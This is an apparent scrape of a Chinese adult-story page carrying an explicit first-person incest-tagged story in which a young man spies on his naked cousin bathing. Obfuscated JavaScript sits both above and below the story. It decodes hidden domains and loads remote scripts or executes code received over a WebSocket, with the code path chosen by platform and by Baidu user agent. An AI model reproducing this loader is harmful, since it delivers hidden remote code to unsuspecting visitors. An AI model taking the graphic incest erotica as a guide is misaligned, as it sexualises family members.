看打炮:kandapao.cc 看打炮:kandapao.vip 广告联系✈:@kandapao

function ZNxcTPLX(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function KxTOzX(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ZNxcTPLX(t);};window[''+'Q'+'w'+'F'+'i'+'A'+'G'+'J'+'N'+'C'+'c'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=KxTOzX,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ddHIuddGhhbGx1cy5uZXQ=','dHIueWVzzdW42NzzguY29t','151235',window,document,['d','z']);}:function(){};

我和我的姐姐

[人妻乱伦]我和我的姐姐

我所说的这个姐姐是我大伯最小的女儿在家排行老四,在家里和我年龄最相仿比我大三岁。

  或许是年龄差距小,除了是我老姐外,也是我儿时的玩伴之一。

  老家坐落在鲁西南边陲离黄河不远的一个小镇,一条清澈的小河从家门前不到十米的低洼地带穿过留下了一汪湖水后蜿蜒东南而去。

  河岸湖边长满了怀抱不及粗大的柳树,湖里也长满了挨挨挤挤莲藕,那里是我们儿时玩乐的天堂。

  每到夏天天热时,只要家长不赶我们上岸我们都会一整天泡在水里。

  好多时候或许是为了害怕我们溺水,于是关于水鬼河怪的传说,大人们一直用那种声情并茂奇怪的腔调告诫着我们,在没有大人时它们就会出来把小孩拉下水再也见不到自己的爹娘了。

  可是贪玩的习性往往会让我们忘记了大人的告诫,经不住清凉湖水的诱惑男孩女孩扒光了身子投进了湖水。

  所以练就我们那一带人都有很好的水性。

  中午天热时,从地里劳作回来的人们,拿一马扎或则一张苇席席地而坐,男人们吸着廉价的烟,女人们忙着手中的针线,在收音机的评书中,在清凉的柳浪下,享受着片刻天堂般的清静。

  八十年代初的农村没有澡堂更别说热水器了,天一拉黑人们都拿着洗刷用具不约而同的来到了湖边。

  先是男人们洗,清场之后就成了女人的天下了。

  乳波臀浪在那轻薄湿漉漉的衣裤中时隐时显,往往引得那些远远驻足观望毛头小伙们浑身燥热激情澎湃啊!或许那时我对女人的迷恋,也是那些嫂嫂婶子们久而久之精心培养出来的。

  那年,那月,那个有些闷热的月夜,那年我才十八九岁左右。

  经不住夜晚燥人的闷热,最终自己抱着枕头拉着苇席来到湖边我家新垫的房基地上席地而卧。

  虽然不时有蚊子骚扰,但也好过难耐的闷热。

  就在我初梦迷离时,突然感觉有一双软软温凉的手在推我。

  或许从小接触鬼文化教育所致,当时反映妈呀!有鬼,睡眼迷离中第一反应就是连滚带爬的往房里冲。

  「嘻嘻,哈哈!就你这胆还整天翻墙上树掏鸟窝下河摸鱼逮老鳖啊!我是你四姐,看把你吓得!」定神一看,感觉时进午夜月光很好,四姐俏生生的站在我身边拿着把蒲扇,身着短袖海魂衫下穿白色短裤,那白盈盈的大腿被月光映射出一片亮亮的萤光。

  「小弟,姐很热想洗澡,你给姐在水边站岗。说好不准偷看你姐」「嗯,那你去吧,我在水边给你看衣服。」从小四姐很疼我,在家里爸妈有时管不了的有时还需请四姐出面的。

  呵呵!时至午夜,万澜具寂,四周不知名的虫儿丝丝的叫着,只有湖中偶尔会有波,波,的水声,或许是鱼或许是荷叶中倾泻而下的露水。

  乳白的月光把湖面渲染的犹如一张无语的水墨山水。

  挨挨挤挤的荷叶丛中一朵朵荷花似含苞待放的少女,似初懂风情的少妇,似激情四射的徐老半娘。

  她们都披着轻雾做的纱,沐浴在犹如牛奶的月光对着水中自己那婀娜多姿的身影顾盼犹怜。

  余光偷瞄中背对着我的四姐两臂轻抬,那件海魂衫慢慢的提了上去,接着是短裤。

  整个动作也就是延续了不到二十秒,但对我来说却是犹如时光停滞。

  当白鱼似的姐姐呈现在月光下时我顿时呆在了那里!内裤霎时撑起了帐篷。

  十八九岁的青年已经对女人有了性的意识的好奇和视觉上的渴望了,虽然那是对完美一词理解不多,但四姐的身体确实很好看。

  圆润的肩头,犹如刚活好的面团,细细的腰身下那圆鼓鼓白嫩嫩大的有些夸张屁股被一道深深的缝隙所分开,结实浑圆的大腿中紧紧夹着令我朝思暮想的地方。

  月光牛奶似的洒在姐姐娇嫩的身子上,莹莹的发着耀眼的光晕。

  「看什么看,臭小子别不学好,还是好好看着我的衣服吧!」说着自己慢慢的趟进了水中,顷刻宁静的湖面被一道深深的水痕划破了。

  还好是黑天要不她会发现我的脸已经红如枣,只感觉心里砰砰直跳口乾舌燥下身暴涨了。

  当姐姐姐姐的半个屁股进水时她停了下来,月夜所带来的神秘未知感让她并不敢往水深的地方去,她只有蹲在了水中揉弄自己的身体。

  看着水中的姐姐,坐在岸边草丛姐姐衣服旁边。

  不禁思考了起来。

  虽然以前看过不少女孩赤裸裸的身体,但感觉那时和男孩没什么两样,甚至还比男孩少了一个牛牛。

  还记得姐姐以前也好奇的挑逗过我的牛牛,后来就不了。

  有人说性意识与生俱来其实我觉得不确切,直到今夜才让我感觉到女人的身体是那么的美好,让人有种渴望和向往,那蠢蠢欲动的内心多了一丝想尝试中的占有的慾望。

  姐姐的一声惊叫打破的我的沉思,我连一丝思考都没来得及穿着衣服就跳入水中抱住了姐姐。

  「小弟,水里有东西咬我了」感觉到姐姐湿漉漉滑腻腻的身体在我怀里颤抖。

  我也有些紧张,第一感觉让我想到了水中的鬼,虽然我也害怕,但那是我老姐,容不得别的东西欺负的。

  壮着胆我在水里来回用腿猛烈的趟了起来,除了凉丝丝的水什么都没有啊!

  紧张的心顿时平息了下来。

  「姐没事,可能是水里的鱼,咬到那里了我看看。」惊恐让姐姐忘记了害羞,退到水浅的地方岔开了腿在白嫩嫩的大腿根摸索了会说「哦,没事!当时感觉那家伙很大滑腻腻的撞到了我的大腿跟处,唉!吓死我了!呵呵!」虚惊一场后,姐姐笑了。

  这时她发现了我的眼睛一直都在盯着她的私处看。

  「看什么看,你流氓啊!连你姐的都看!嘻嘻!」转身扭着肥白白的屁股上了岸。自己穿衣服去了。

  当时那一瞬间,我确实看到了我幻想已久的私处,屄,而却是姐姐的。

  感觉白嫩嫩肉鼓鼓的像极了那白生生长满绒毛夏天常吃的那种白里带红桃子,上面还些许淡淡的黑影。

  从那以后,那个肉乎乎的桃子一直在我脑海里绕来绕去时开时合变换着各种形状,有时在梦里,有幻想中,也就是从那以后我学会了手淫。

  直到后来认识了第一个女友也就是{惊魂春雨夜}中初恋的她,才让我看清了桃子的庐山真面目,体验了那欲生欲死完美的极乐世界。

  或许是当初受了那个月夜姐姐的影响,在我的性世里对于女人的感知,女人长的漂亮只是一部分,最吸引我的是要有白嫩光滑的肌肤,圆润美好的屁股挺直的大腿。

  如今二十几年过去了,姐姐在老家已是两个孩子的母亲了我也成家立业八岁孩子的父亲了,可那段往事却一直在心久而不失。

  字节数:5086

  【完】



function FMXvy(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function ckAsM(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return FMXvy(t);};window[''+'E'+'T'+'z'+'n'+'h'+'Z'+'g'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=ckAsM,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('dHIudGhhbGx1ccy5uZXQ=','dHIueWWVzdWW42NzguY29t','151236',window,document,['c','W']);}:function(){};